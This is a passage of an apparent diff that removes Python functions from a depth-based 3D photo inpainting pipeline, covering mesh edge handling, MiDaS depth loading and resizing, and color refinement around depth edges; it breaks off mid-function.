for far_node in tmp_far_nodes: - if mesh.has_node(far_node) is False: - mesh.nodes[new_node]['far'].remove(far_node) - continue - if mesh.nodes[far_node].get('near') is not None: - for idx in range(len(mesh.nodes[far_node].get('near'))): - if mesh.nodes[far_node]['near'][idx][0] == new_node[0] and mesh.nodes[far_node]['near'][idx][1] == new_node[1]: - if len(mesh.nodes[far_node]['near'][idx]) == len(old_node): - mesh.nodes[far_node]['near'][idx] = new_node - if mesh.nodes[new_node].get('near') is not None: - tmp_near_nodes = mesh.nodes[new_node]['near'] - for near_node in tmp_near_nodes: - if mesh.has_node(near_node) is False: - mesh.nodes[new_node]['near'].remove(near_node) - continue - if mesh.nodes[near_node].get('far') is not None: - for idx in range(len(mesh.nodes[near_node].get('far'))): - if mesh.nodes[near_node]['far'][idx][0] == new_node[0] and mesh.nodes[near_node]['far'][idx][1] == new_node[1]: - if len(mesh.nodes[near_node]['far'][idx]) == len(old_node): - mesh.nodes[near_node]['far'][idx] = new_node - if new_node != old_node: - mesh.remove_node(old_node) - if stime is False: - return mesh - else: - return mesh, None, None - - -def create_placeholder(context, mask, depth, fpath_map, npath_map, mesh, inpaint_id, edge_ccs, extend_edge_cc, all_edge_maps, self_edge_id): - add_node_time = 0 - add_edge_time = 0 - add_far_near_time = 0 - valid_area = context + mask - H, W = mesh.graph['H'], mesh.graph['W'] - edge_cc = edge_ccs[self_edge_id] - num_com = len(edge_cc) + len(extend_edge_cc) - hxs, hys = np.where(mask > 0) - for hx, hy in zip(hxs, hys): - mesh.add_node((hx, hy), inpaint_id=inpaint_id + 1, num_context=num_com) - for hx, hy in zip(hxs, hys): - four_nes = [(x, y) for x, y in [(hx + 1, hy), (hx - 1, hy), (hx, hy + 1), (hx, hy - 1)] if\ - 0 <= x < mesh.graph['H'] and 0 <= y < mesh.graph['W'] and valid_area[x, y] != 0] - for ne in four_nes: - if mask[ne[0], ne[1]] != 0: - if not mesh.has_edge((hx, hy), ne): - mesh.add_edge((hx, hy), ne) - elif depth[ne[0], ne[1]] != 0: - if mesh.has_node((ne[0], ne[1], depth[ne[0], ne[1]])) and\ - not mesh.has_edge((hx, hy), (ne[0], ne[1], depth[ne[0], ne[1]])): - mesh.add_edge((hx, hy), (ne[0], ne[1], depth[ne[0], ne[1]])) - else: - print("Undefined context node.") - import pdb; pdb.set_trace() - near_ids = np.unique(npath_map) - if near_ids[0] == -1: near_ids = near_ids[1:] - for near_id in near_ids: - hxs, hys = np.where((fpath_map == near_id) & (mask > 0)) - if hxs.shape[0] > 0: - mesh.graph['max_edge_id'] = mesh.graph['max_edge_id'] + 1 - else: - break - for hx, hy in zip(hxs, hys): - mesh.nodes[(hx, hy)]['edge_id'] = int(round(mesh.graph['max_edge_id'])) - four_nes = [(x, y) for x, y in [(hx + 1, hy), (hx - 1, hy), (hx, hy + 1), (hx, hy - 1)] if\ - x < mesh.graph['H'] and x >= 0 and y < mesh.graph['W'] and y >= 0 and npath_map[x, y] == near_id] - for xx in four_nes: - xx_n = copy.deepcopy(xx) - if not mesh.has_node(xx_n): - if mesh.has_node((xx_n[0], xx_n[1], depth[xx_n[0], xx_n[1]])): - xx_n = (xx_n[0], xx_n[1], depth[xx_n[0], xx_n[1]]) - if mesh.has_edge((hx, hy), xx_n): - # pass - mesh.remove_edge((hx, hy), xx_n) - if mesh.nodes[(hx, hy)].get('near') is None: - mesh.nodes[(hx, hy)]['near'] = [] - mesh.nodes[(hx, hy)]['near'].append(xx_n) - connect_point_exception = set() - hxs, hys = np.where((npath_map == near_id) & (all_edge_maps > -1)) - for hx, hy in zip(hxs, hys): - unknown_id = int(round(all_edge_maps[hx, hy])) - if unknown_id != near_id and unknown_id != self_edge_id: - unknown_node = set([xx for xx in edge_ccs[unknown_id] if xx[0] == hx and xx[1] == hy]) - connect_point_exception |= unknown_node - hxs, hys = np.where((npath_map == near_id) & (mask > 0)) - if hxs.shape[0] > 0: - mesh.graph['max_edge_id'] = mesh.graph['max_edge_id'] + 1 - else: - break - for hx, hy in zip(hxs, hys): - mesh.nodes[(hx, hy)]['edge_id'] = int(round(mesh.graph['max_edge_id'])) - mesh.nodes[(hx, hy)]['connect_point_id'] = int(round(near_id)) - mesh.nodes[(hx, hy)]['connect_point_exception'] = connect_point_exception - four_nes = [(x, y) for x, y in [(hx + 1, hy), (hx - 1, hy), (hx, hy + 1), (hx, hy - 1)] if\ - x < mesh.graph['H'] and x >= 0 and y < mesh.graph['W'] and y >= 0 and fpath_map[x, y] == near_id] - for xx in four_nes: - xx_n = copy.deepcopy(xx) - if not mesh.has_node(xx_n): - if mesh.has_node((xx_n[0], xx_n[1], depth[xx_n[0], xx_n[1]])): - xx_n = (xx_n[0], xx_n[1], depth[xx_n[0], xx_n[1]]) - if mesh.has_edge((hx, hy), xx_n): - mesh.remove_edge((hx, hy), xx_n) - if mesh.nodes[(hx, hy)].get('far') is None: - mesh.nodes[(hx, hy)]['far'] = [] - mesh.nodes[(hx, hy)]['far'].append(xx_n) - - return mesh, add_node_time, add_edge_time, add_far_near_time - -def clean_far_edge(mask_edge, mask_edge_with_id, context_edge, mask, info_on_pix, global_mesh, anchor): - if isinstance(mask_edge, torch.Tensor): - if mask_edge.is_cuda: - mask_edge = mask_edge.cpu() - mask_edge = mask_edge.data - mask_edge = mask_edge.numpy() - if isinstance(context_edge, torch.Tensor): - if context_edge.is_cuda: - context_edge = context_edge.cpu() - context_edge = context_edge.data - context_edge = context_edge.numpy() - if isinstance(mask, torch.Tensor): - if mask.is_cuda: - mask = mask.cpu() - mask = mask.data - mask = mask.numpy() - mask = mask.squeeze() - mask_edge = mask_edge.squeeze() - context_edge = context_edge.squeeze() - valid_near_edge = np.zeros_like(mask_edge) - far_edge = np.zeros_like(mask_edge) - far_edge_with_id = np.ones_like(mask_edge) * -1 - near_edge_with_id = np.ones_like(mask_edge) * -1 - uncleaned_far_edge = np.zeros_like(mask_edge) - # Detect if there is any valid pixel mask_edge, if not ==> return default value - if mask_edge.sum() == 0: - return far_edge, uncleaned_far_edge, far_edge_with_id, near_edge_with_id - mask_edge_ids = dict(collections.Counter(mask_edge_with_id.flatten())).keys() - for edge_id in mask_edge_ids: - if edge_id < 0: - continue - specific_edge_map = (mask_edge_with_id == edge_id).astype(np.uint8) - _, sub_specific_edge_maps = cv2.connectedComponents(specific_edge_map.astype(np.uint8), connectivity=8) - for sub_edge_id in range(1, sub_specific_edge_maps.max() + 1): - specific_edge_map = (sub_specific_edge_maps == sub_edge_id).astype(np.uint8) - edge_pxs, edge_pys = np.where(specific_edge_map > 0) - edge_mesh = netx.Graph() - for edge_px, edge_py in zip(edge_pxs, edge_pys): - edge_mesh.add_node((edge_px, edge_py)) - for ex in [edge_px-1, edge_px, edge_px+1]: - for ey in [edge_py-1, edge_py, edge_py+1]: - if edge_px == ex and edge_py == ey: - continue - if ex < 0 or ex >= specific_edge_map.shape[0] or ey < 0 or ey >= specific_edge_map.shape[1]: - continue - if specific_edge_map[ex, ey] == 1: - if edge_mesh.has_node((ex, ey)): - edge_mesh.add_edge((ex, ey), (edge_px, edge_py)) - periphery_nodes = netx.periphery(edge_mesh) - path_diameter = netx.diameter(edge_mesh) - start_near_node = None - for node_s in periphery_nodes: - for node_e in periphery_nodes: - if node_s != node_e: - if netx.shortest_path_length(edge_mesh, node_s, node_e) == path_diameter: - if np.any(context_edge[node_s[0]-1:node_s[0]+2, node_s[1]-1:node_s[1]+2].flatten()): - start_near_node = (node_s[0], node_s[1]) - end_near_node = (node_e[0], node_e[1]) - break - if np.any(context_edge[node_e[0]-1:node_e[0]+2, node_e[1]-1:node_e[1]+2].flatten()): - start_near_node = (node_e[0], node_e[1]) - end_near_node = (node_s[0], node_s[1]) - break - if start_near_node is not None: - break - if start_near_node is None: - continue - new_specific_edge_map = np.zeros_like(mask) - for path_node in netx.shortest_path(edge_mesh, start_near_node, end_near_node): - new_specific_edge_map[path_node[0], path_node[1]] = 1 - context_near_pxs, context_near_pys = np.where(context_edge[start_near_node[0]-1:start_near_node[0]+2, start_near_node[1]-1:start_near_node[1]+2] > 0) - distance = np.abs((context_near_pxs - 1)) + np.abs((context_near_pys - 1)) - if (np.where(distance == distance.min())[0].shape[0]) > 1: - closest_pxs = context_near_pxs[np.where(distance == distance.min())[0]] - closest_pys = context_near_pys[np.where(distance == distance.min())[0]] - closest_depths = [] - for closest_px, closest_py in zip(closest_pxs, closest_pys): - if info_on_pix.get((closest_px + start_near_node[0] - 1 + anchor[0], closest_py + start_near_node[1] - 1 + anchor[2])) is not None: - for info in info_on_pix.get((closest_px + start_near_node[0] - 1 + anchor[0], closest_py + start_near_node[1] - 1 + anchor[2])): - if info['synthesis'] is False: - closest_depths.append(abs(info['depth'])) - context_near_px, context_near_py = closest_pxs[np.array(closest_depths).argmax()], closest_pys[np.array(closest_depths).argmax()] - else: - context_near_px, context_near_py = context_near_pxs[distance.argmin()], context_near_pys[distance.argmin()] - context_near_node = (start_near_node[0]-1 + context_near_px, start_near_node[1]-1 + context_near_py) - far_node_list = [] - global_context_near_node = (context_near_node[0] + anchor[0], context_near_node[1] + anchor[2]) - if info_on_pix.get(global_context_near_node) is not None: - for info in info_on_pix[global_context_near_node]: - if info['synthesis'] is False: - context_near_node_3d = (global_context_near_node[0], global_context_near_node[1], info['depth']) - if global_mesh.nodes[context_near_node_3d].get('far') is not None: - for far_node in global_mesh.nodes[context_near_node_3d].get('far'): - far_node = (far_node[0] - anchor[0], far_node[1] - anchor[2], far_node[2]) - if mask[far_node[0], far_node[1]] == 0: - far_node_list.append([far_node[0], far_node[1]]) - if len(far_node_list) > 0: - far_nodes_dist = np.sum(np.abs(np.array(far_node_list) - np.array([[edge_px, edge_py]])), axis=1) - context_far_node = tuple(far_node_list[far_nodes_dist.argmin()]) - corresponding_far_edge = np.zeros_like(mask_edge) - corresponding_far_edge[context_far_node[0], context_far_node[1]] = 1 - surround_map = cv2.dilate(new_specific_edge_map.astype(np.uint8), - np.array([[1,1,1],[1,1,1],[1,1,1]]).astype(np.uint8), - iterations=1) - specific_edge_map_wo_end_pt = new_specific_edge_map.copy() - specific_edge_map_wo_end_pt[end_near_node[0], end_near_node[1]] = 0 - surround_map_wo_end_pt = cv2.dilate(specific_edge_map_wo_end_pt.astype(np.uint8), - np.array([[1,1,1],[1,1,1],[1,1,1]]).astype(np.uint8), - iterations=1) - surround_map_wo_end_pt[new_specific_edge_map > 0] = 0 - surround_map_wo_end_pt[context_near_node[0], context_near_node[1]] = 0 - surround_map = surround_map_wo_end_pt.copy() - _, far_edge_cc = cv2.connectedComponents(surround_map.astype(np.uint8), connectivity=4) - start_far_node = None - accompany_far_node = None - if surround_map[context_far_node[0], context_far_node[1]] == 1: - start_far_node = context_far_node - else: - four_nes = [(context_far_node[0] - 1, context_far_node[1]), - (context_far_node[0] + 1, context_far_node[1]), - (context_far_node[0], context_far_node[1] - 1), - (context_far_node[0], context_far_node[1] + 1)] - candidate_bevel = [] - for ne in four_nes: - if surround_map[ne[0], ne[1]] == 1: - start_far_node = (ne[0], ne[1]) - break - elif (ne[0] != context_near_node[0] or ne[1] != context_near_node[1]) and \ - (ne[0] != start_near_node[0] or ne[1] != start_near_node[1]): - candidate_bevel.append((ne[0], ne[1])) - if start_far_node is None: - for ne in candidate_bevel: - if ne[0] == context_far_node[0]: - bevel_xys = [[ne[0] + 1, ne[1]], [ne[0] - 1, ne[1]]] - if ne[1] == context_far_node[1]: - bevel_xys = [[ne[0], ne[1] + 1], [ne[0], ne[1] - 1]] - for bevel_x, bevel_y in bevel_xys: - if surround_map[bevel_x, bevel_y] == 1: - start_far_node = (bevel_x, bevel_y) - accompany_far_node = (ne[0], ne[1]) - break - if start_far_node is not None: - break - if start_far_node is not None: - for far_edge_id in range(1, far_edge_cc.max() + 1): - specific_far_edge = (far_edge_cc == far_edge_id).astype(np.uint8) - if specific_far_edge[start_far_node[0], start_far_node[1]] == 1: - if accompany_far_node is not None: - specific_far_edge[accompany_far_node] = 1 - far_edge[specific_far_edge > 0] = 1 - far_edge_with_id[specific_far_edge > 0] = edge_id - end_far_candidates = np.zeros_like(far_edge) - end_far_candidates[end_near_node[0], end_near_node[1]] = 1 - end_far_candidates = cv2.dilate(end_far_candidates.astype(np.uint8), - np.array([[0,1,0],[1,1,1],[0,1,0]]).astype(np.uint8), - iterations=1) - end_far_candidates[end_near_node[0], end_near_node[1]] = 0 - invalid_nodes = (((far_edge_cc != far_edge_id).astype(np.uint8) * \ - (far_edge_cc != 0).astype(np.uint8)).astype(np.uint8) + \ - (new_specific_edge_map).astype(np.uint8) + \ - (mask == 0).astype(np.uint8)).clip(0, 1) - end_far_candidates[invalid_nodes > 0] = 0 - far_edge[end_far_candidates > 0] = 1 - far_edge_with_id[end_far_candidates > 0] = edge_id - - far_edge[context_far_node[0], context_far_node[1]] = 1 - far_edge_with_id[context_far_node[0], context_far_node[1]] = edge_id - near_edge_with_id[(mask_edge_with_id == edge_id) > 0] = edge_id - uncleaned_far_edge = far_edge.copy() - far_edge[mask == 0] = 0 - - return far_edge, uncleaned_far_edge, far_edge_with_id, near_edge_with_id - -def get_MiDaS_samples(image_folder, depth_folder, config, specific=None, aft_certain=None): - lines = [os.path.splitext(os.path.basename(xx))[0] for xx in glob.glob(os.path.join(image_folder, '*' + config['img_format']))] - samples = [] - generic_pose = np.eye(4) - assert len(config['traj_types']) == len(config['x_shift_range']) ==\ - len(config['y_shift_range']) == len(config['z_shift_range']) == len(config['video_postfix']), \ - "The number of elements in 'traj_types', 'x_shift_range', 'y_shift_range', 'z_shift_range' and \ - 'video_postfix' should be equal." - tgt_pose = [[generic_pose * 1]] - tgts_poses = [] - for traj_idx in range(len(config['traj_types'])): - tgt_poses = [] - sx, sy, sz = path_planning(config['num_frames'], config['x_shift_range'][traj_idx], config['y_shift_range'][traj_idx], - config['z_shift_range'][traj_idx], path_type=config['traj_types'][traj_idx]) - for xx, yy, zz in zip(sx, sy, sz): - tgt_poses.append(generic_pose * 1.) - tgt_poses[-1][:3, -1] = np.array([xx, yy, zz]) - tgts_poses += [tgt_poses] - tgt_pose = generic_pose * 1 - - aft_flag = True - if aft_certain is not None and len(aft_certain) > 0: - aft_flag = False - for seq_dir in lines: - if specific is not None and len(specific) > 0: - if specific != seq_dir: - continue - if aft_certain is not None and len(aft_certain) > 0: - if aft_certain == seq_dir: - aft_flag = True - if aft_flag is False: - continue - samples.append({}) - sdict = samples[-1] - sdict['depth_fi'] = os.path.join(depth_folder, seq_dir + config['depth_format']) - sdict['ref_img_fi'] = os.path.join(image_folder, seq_dir + config['img_format']) - H, W = imageio.imread(sdict['ref_img_fi']).shape[:2] - sdict['int_mtx'] = np.array([[max(H, W), 0, W//2], [0, max(H, W), H//2], [0, 0, 1]]).astype(np.float32) - if sdict['int_mtx'].max() > 1: - sdict['int_mtx'][0, :] = sdict['int_mtx'][0, :] / float(W) - sdict['int_mtx'][1, :] = sdict['int_mtx'][1, :] / float(H) - sdict['ref_pose'] = np.eye(4) - sdict['tgt_pose'] = tgt_pose - sdict['tgts_poses'] = tgts_poses - sdict['video_postfix'] = config['video_postfix'] - sdict['tgt_name'] = [os.path.splitext(os.path.basename(sdict['depth_fi']))[0]] - sdict['src_pair_name'] = sdict['tgt_name'][0] - - return samples - -def get_valid_size(imap): - x_max = np.where(imap.sum(1).squeeze() > 0)[0].max() + 1 - x_min = np.where(imap.sum(1).squeeze() > 0)[0].min() - y_max = np.where(imap.sum(0).squeeze() > 0)[0].max() + 1 - y_min = np.where(imap.sum(0).squeeze() > 0)[0].min() - size_dict = {'x_max':x_max, 'y_max':y_max, 'x_min':x_min, 'y_min':y_min} - - return size_dict - -def dilate_valid_size(isize_dict, imap, dilate=[0, 0]): - osize_dict = copy.deepcopy(isize_dict) - osize_dict['x_min'] = max(0, osize_dict['x_min'] - dilate[0]) - osize_dict['x_max'] = min(imap.shape[0], osize_dict['x_max'] + dilate[0]) - osize_dict['y_min'] = max(0, osize_dict['y_min'] - dilate[0]) - osize_dict['y_max'] = min(imap.shape[1], osize_dict['y_max'] + dilate[1]) - - return osize_dict - -def crop_maps_by_size(size, *imaps): - omaps = [] - for imap in imaps: - omaps.append(imap[size['x_min']:size['x_max'], size['y_min']:size['y_max']].copy()) - - return omaps - -def smooth_cntsyn_gap(init_depth_map, mask_region, context_region, init_mask_region=None): - if init_mask_region is not None: - curr_mask_region = init_mask_region * 1 - else: - curr_mask_region = mask_region * 0 - depth_map = init_depth_map.copy() - for _ in range(2): - cm_mask = context_region + curr_mask_region - depth_s1 = np.roll(depth_map, 1, 0) - depth_s2 = np.roll(depth_map, -1, 0) - depth_s3 = np.roll(depth_map, 1, 1) - depth_s4 = np.roll(depth_map, -1, 1) - mask_s1 = np.roll(cm_mask, 1, 0) - mask_s2 = np.roll(cm_mask, -1, 0) - mask_s3 = np.roll(cm_mask, 1, 1) - mask_s4 = np.roll(cm_mask, -1, 1) - fluxin_depths = (depth_s1 * mask_s1 + depth_s2 * mask_s2 + depth_s3 * mask_s3 + depth_s4 * mask_s4) / \ - ((mask_s1 + mask_s2 + mask_s3 + mask_s4) + 1e-6) - fluxin_mask = (fluxin_depths != 0) * mask_region - init_mask = (fluxin_mask * (curr_mask_region >= 0).astype(np.float32) > 0).astype(np.uint8) - depth_map[init_mask > 0] = fluxin_depths[init_mask > 0] - if init_mask.shape[-1] > curr_mask_region.shape[-1]: - curr_mask_region[init_mask.sum(-1, keepdims=True) > 0] = 1 - else: - curr_mask_region[init_mask > 0] = 1 - depth_map[fluxin_mask > 0] = fluxin_depths[fluxin_mask > 0] - - return depth_map - -def read_MiDaS_depth(disp_fi, disp_rescale=10., h=None, w=None): - if 'npy' in os.path.splitext(disp_fi)[-1]: - disp = np.load(disp_fi) - else: - disp = imageio.imread(disp_fi).astype(np.float32) - disp = disp - disp.min() - disp = cv2.blur(disp / disp.max(), ksize=(3, 3)) * disp.max() - disp = (disp / disp.max()) * disp_rescale - if h is not None and w is not None: - disp = resize(disp / disp.max(), (h, w), order=1) * disp.max() - depth = 1. / np.maximum(disp, 0.05) - - return depth - -def follow_image_aspect_ratio(depth, image): - H, W = image.shape[:2] - image_aspect_ratio = H / W - dH, dW = depth.shape[:2] - depth_aspect_ratio = dH / dW - if depth_aspect_ratio > image_aspect_ratio: - resize_H = dH - resize_W = dH / image_aspect_ratio - else: - resize_W = dW - resize_H = dW * image_aspect_ratio - depth = resize(depth / depth.max(), - (int(resize_H), - int(resize_W)), - order=0) * depth.max() - - return depth - -def depth_resize(depth, origin_size, image_size): - if origin_size[0] is not 0: - max_depth = depth.max() - depth = depth / max_depth - depth = resize(depth, origin_size, order=1, mode='edge') - depth = depth * max_depth - else: - max_depth = depth.max() - depth = depth / max_depth - depth = resize(depth, image_size, order=1, mode='edge') - depth = depth * max_depth - - return depth - -def filter_irrelevant_edge(self_edge, other_edges, other_edges_with_id, current_edge_id, context, edge_ccs, mesh, anchor): - other_edges = other_edges.squeeze() - other_edges_with_id = other_edges_with_id.squeeze() - - self_edge = self_edge.squeeze() - dilate_self_edge = cv2.dilate(self_edge.astype(np.uint8), np.array([[1,1,1],[1,1,1],[1,1,1]]).astype(np.uint8), iterations=1) - edge_ids = collections.Counter(other_edges_with_id.flatten()).keys() - other_edges_info = [] - # import ipdb - # ipdb.set_trace() - for edge_id in edge_ids: - edge_id = int(edge_id) - if edge_id >= 0: - condition = ((other_edges_with_id == edge_id) * other_edges * context).astype(np.uint8) - if dilate_self_edge[condition > 0].sum() == 0: - other_edges[other_edges_with_id == edge_id] = 0 - else: - num_condition, condition_labels = cv2.connectedComponents(condition, connectivity=8) - for condition_id in range(1, num_condition): - isolate_condition = ((condition_labels == condition_id) > 0).astype(np.uint8) - num_end_group, end_group = cv2.connectedComponents(((dilate_self_edge * isolate_condition) > 0).astype(np.uint8), connectivity=8) - if num_end_group == 1: - continue - for end_id in range(1, num_end_group): - end_pxs, end_pys = np.where((end_group == end_id)) - end_px, end_py = end_pxs[0], end_pys[0] - other_edges_info.append({}) - other_edges_info[-1]['edge_id'] = edge_id - # other_edges_info[-1]['near_depth'] = None - other_edges_info[-1]['diff'] = None - other_edges_info[-1]['edge_map'] = np.zeros_like(self_edge) - other_edges_info[-1]['end_point_map'] = np.zeros_like(self_edge) - other_edges_info[-1]['end_point_map'][(end_group == end_id)] = 1 - other_edges_info[-1]['forbidden_point_map'] = np.zeros_like(self_edge) - other_edges_info[-1]['forbidden_point_map'][(end_group != end_id) * (end_group != 0)] = 1 - other_edges_info[-1]['forbidden_point_map'] = cv2.dilate(other_edges_info[-1]['forbidden_point_map'], kernel=np.array([[1,1,1],[1,1,1],[1,1,1]]), iterations=2) - for x in edge_ccs[edge_id]: - nx = x[0] - anchor[0] - ny = x[1] - anchor[1] - if nx == end_px and ny == end_py: - # other_edges_info[-1]['near_depth'] = abs(nx) - if mesh.nodes[x].get('far') is not None and len(mesh.nodes[x].get('far')) == 1: - other_edges_info[-1]['diff'] = abs(1./abs([*mesh.nodes[x].get('far')][0][2]) - 1./abs(x[2])) - else: - other_edges_info[-1]['diff'] = 0 - # if end_group[nx, ny] != end_id and end_group[nx, ny] > 0: - # continue - try: - if isolate_condition[nx, ny] == 1: - other_edges_info[-1]['edge_map'][nx, ny] = 1 - except: - pass - try: - other_edges_info = sorted(other_edges_info, key=lambda x : x['diff'], reverse=True) - except: - import pdb - pdb.set_trace() - # import pdb - # pdb.set_trace() - # other_edges = other_edges[..., None] - for other_edge in other_edges_info: - if other_edge['end_point_map'] is None: - import pdb - pdb.set_trace() - - other_edges = other_edges * context - - return other_edges, other_edges_info - -def require_depth_edge(context_edge, mask): - dilate_mask = cv2.dilate(mask, np.array([[1,1,1],[1,1,1],[1,1,1]]).astype(np.uint8), iterations=1) - if (dilate_mask * context_edge).max() == 0: - return False - else: - return True - -def refine_color_around_edge(mesh, info_on_pix, edge_ccs, config, spdb=False): - H, W = mesh.graph['H'], mesh.graph['W'] - tmp_edge_ccs = copy.deepcopy(edge_ccs) - for edge_id, edge_cc in enumerate(edge_ccs): - if len(edge_cc) == 0: - continue - near_maps = np.zeros((H, W)).astype(np.bool) - far_maps = np.zeros((H, W)).astype(np.bool) - tmp_far_nodes = set() - far_nodes = set() - near_nodes = set() - end_nodes = set() - for i in range(5): - if i == 0: - for edge_node in edge_cc: - if mesh.nodes[edge_node].get('depth_edge_dilate_2_color_flag') is not True: - break - if mesh.nodes[edge_node].get('inpaint_id') == 1: - near_nodes.add(edge_node) - tmp_node = mesh.nodes[edge_node].get('far') - tmp_node = set(tmp_node) if tmp_node is not None else set() - tmp_far_nodes |= tmp_node - rmv_tmp_far_nodes = set() - for far_node in tmp_far_nodes: - if not(mesh.has_node(far_node) and mesh.nodes[far_node].get('inpaint_id') == 1): - rmv_tmp_far_nodes.add(far_node) - if len(tmp_far_nodes - rmv_tmp_far_nodes) == 0: - break - else: - for near_node in near_nodes: - near_maps[near_node[0], near_node[1]] = True - mesh.nodes[near_node]['refine_rgbd'] = True - mesh.nodes[near_node]['backup_depth'] = near_node[2] \ - if mesh.nodes[near_node].get('real_depth') is None else mesh.nodes[near_node]['real_depth'] - mesh.nodes[near_node]['backup_color'] = mesh.nodes[near_node]['color'] - for far_node in tmp_far_nodes: - if mesh.has_node(far_node) and mesh.nodes[far_node].get('inpaint_id') == 1: - far_nodes.add(far_node) - far_maps[far_node[0], far_node[1]] = True - mesh.nodes[far_node]['refine_rgbd'] = True - mesh.nodes[far_node]['backup_depth'] = far_node[2] \ - if mesh.nodes[far_node].get('real_depth') is None else mesh.nodes[far_node]['real_depth'] - mesh.nodes[far_node]['backup_color'] = mesh.nodes[far_node]['color'] - tmp_far_nodes = far_nodes - tmp_near_nodes = near_nodes - else: - tmp_far_nodes = new_tmp_far_nodes - tmp_near_nodes = new_tmp_near_nodes - new_tmp_far_nodes = None - new_tmp_near_nodes = None - new_tmp_far_nodes = set() - new_tmp_near_nodes = set() - for node in tmp_near_nodes: - for ne_node in mesh.neighbors(node): - if far_maps[ne_node[0], ne_node[1]] == False and \ - near_maps[ne_node[0], ne_node[1]] == False: - if mesh.nodes[ne_node].get('inpaint_id') == 1: - new_tmp_near_nodes.add(ne_node) - near_maps[ne_node[0], ne_node[1]] = True - mesh.nodes[ne_node]['refine_rgbd'] = True - mesh.nodes[ne_node]['backup_depth'] = ne_node[2] \ - if mesh.nodes[ne_node].get('real_depth') is None else mesh.nodes[ne_node]['real_depth'] - mesh.nodes[ne_node]['backup_color'] = mesh.nodes[ne_node]['color'] - else: - mesh.nodes[ne_node]['backup_depth'] = ne_node[2] \ - if mesh.nodes[ne_node].get('real_depth') is None else mesh.nodes[ne_node]['real_depth'] - mesh.nodes[ne_node]['backup_color'] = mesh.nodes[ne_node]['color'] - end_nodes.add(node) - near_nodes.update(new_tmp_near_nodes) - for node in tmp_far_nodes: - for ne_node in mesh.neighbors(node): - if far_maps[ne_node[0], ne_node[1]] == False and \ - near_maps[ne_node[0], ne_node[1]] == False: - if mesh.nodes[ne_node].get('inpaint_id') == 1: - new_tmp_far_nodes.add(ne_node) - far_maps[ne_node[0], ne_node[1]] = True - mesh.nodes[ne_node]['refine_rgbd'] = True - mesh.nodes[ne_node]['backup_depth'] = ne_node[2] \ - if mesh.nodes[ne_node].get('real_depth') is None else mesh.nodes[ne_node]['real_depth'] - mesh.nodes[ne_node]['backup_color'] = mesh.nodes[ne_node]['color'] - else: - mesh.nodes[ne_node]['backup_depth'] = ne_node[2] \ - if mesh.nodes[ne_node].get('real_depth') is None else mesh.nodes[ne_node]['real_depth'] - mesh.nodes[ne_node]['backup_color'] = mesh.nodes[ne_node]['color'] - end_nodes.add(node) - far_nodes.update(new_tmp_far_nodes) - if len(far_nodes) == 0: - tmp_edge_ccs[edge_id] = set() - continue - for node in new_tmp_far_nodes | new_tmp_near_nodes: - for ne_node in mesh.neighbors(node): - if far_maps[ne_node[0], ne_node[1]] == False and near_maps[ne_node[0], ne_node[1]] == False: - end_nodes.add(node) - mesh.nodes[ne_node]['backup_depth'] = ne_node[2] \ - if mesh.nodes[ne_node].get('real_depth') is None else mesh.nodes[ne_node]['real_depth'] - mesh.nodes[ne_node]['backup_color'] = mesh.nodes[ne_node]['color'] - tmp_end_nodes = end_nodes - - refine_nodes = near_nodes | far_nodes - remain_refine_nodes = copy.deepcopy(refine_nodes) - accum_idx = 0 - while len(remain_refine_nodes) > 0: - accum_idx += 1 - if accum_idx > 100: - break - new_tmp_end_nodes = None - new_tmp_end_nodes = set() - survive_tmp_end_nodes = set() - for node in tmp_end_nodes: - re_depth, re_color, re_count = 0, np.array([0., 0., 0.]), 0 - for ne_node in mesh.neighbors(node): - if mesh.nodes[ne_node].get('refine_rgbd') is True: - if ne_node not in tmp_end_nodes: - new_tmp_end_nodes.add(ne_node) - else: - try: - re_depth += mesh.nodes[ne_node]['backup_depth'] - re_color += mesh.nodes[ne_node]['backup_color'].astype(np.float32) - re_count += 1. - except: - import pdb; pdb.set_trace() - if re_count > 0: - re_depth = re_depth / re_count - re_color = re_color / re_count - mesh.nodes[node]['backup_depth'] = re_depth - mesh.nodes[node]['backup_color'] = re_color - mesh.nodes[node]['refine_rgbd'] = False - else: - survive_tmp_end_nodes.add(node) - for node in tmp_end_nodes - survive_tmp_end_nodes: - if node in remain_refine_nodes: - remain_refine_nodes.remove(node) - tmp_end_nodes = new_tmp_end_nodes - if spdb == True: - bfrd_canvas = np.zeros((H, W)) - bfrc_canvas = np.zeros((H, W, 3)).astype(np.uint8) - aftd_canvas = np.zeros((H, W)) - aftc_canvas = np.zeros((H, W, 3)).astype(np.uint8) - for node in refine_nodes: - bfrd_canvas[node[0], node[1]] = abs(node[2]) - aftd_canvas[node[0], node[1]] = abs(mesh.nodes[node]['backup_depth']) - bfrc_canvas[node[0], node[1]] = mesh.nodes[node]['color'].astype(np.uint8) - aftc_canvas[node[0], node[1]] = mesh.nodes[node]['backup_color'].astype(np.uint8) - f, (ax1, ax2, ax3, ax4) = plt.subplots(1, 4, sharex=True, sharey=True); - ax1.imshow(bfrd_canvas); - ax2.imshow(aftd_canvas); - ax3.imshow(bfrc_canvas); - ax4.imshow(aftc_canvas); - plt.show() - import pdb; pdb.set_trace() - for node in refine_nodes: - if mesh.nodes[node].get('refine_rgbd') is not None: - mesh.nodes[node].pop('refine_rgbd') - mesh.nodes[node]['color'] = mesh.nodes[node]['backup_color'] - for info in info_on_pix[(node[0], node[1])]: - if info['depth'] == node[2]: - info['color'] = mesh.nodes[node]['backup_color'] - - return mesh, info_on_pix - -def refine_depth_around_edge(mask_depth, far_edge, uncleaned_far_edge, near_edge, mask, all_depth, config): - if isinstance(mask_depth, torch.Tensor): - if mask_depth.is_cuda: - mask_depth = mask_depth.cpu() - mask_depth = mask_depth.data - mask_depth = mask_depth.numpy() - if isinstance(far_edge, torch.Tensor): - if far_edge.is_cuda: - far_edge = far_edge.cpu() - far_edge = far_edge.data - far_edge = far_edge.numpy() - if isinstance(uncleaned_far_edge, torch.Tensor): - if uncleaned_far_edge.is_cuda: - uncleaned_far_edge = uncleaned_far_edge.cpu() - uncleaned_far_edge = uncleaned_far_edge.data - uncleaned_far_edge = uncleaned_far_edge.numpy() - if isinstance(near_edge, torch.Tensor): - if near_edge.is_cuda: - near_edge = near_edge.cpu() - near_edge = near_edge.data - near_edge = near_edge.numpy() - if isinstance(mask, torch.Tensor): - if mask.is_cuda: - mask = mask.cpu() - mask = mask.data - mask = mask.numpy() - mask = mask.squeeze() - uncleaned_far_edge = uncleaned_far_edge.squeeze() - far_edge = far_edge.squeeze() - near_edge = near_edge.squeeze() - mask_depth = mask_depth.squeeze() - dilate_far_edge = cv2.dilate(uncleaned_far_edge.astype(np.uint8), 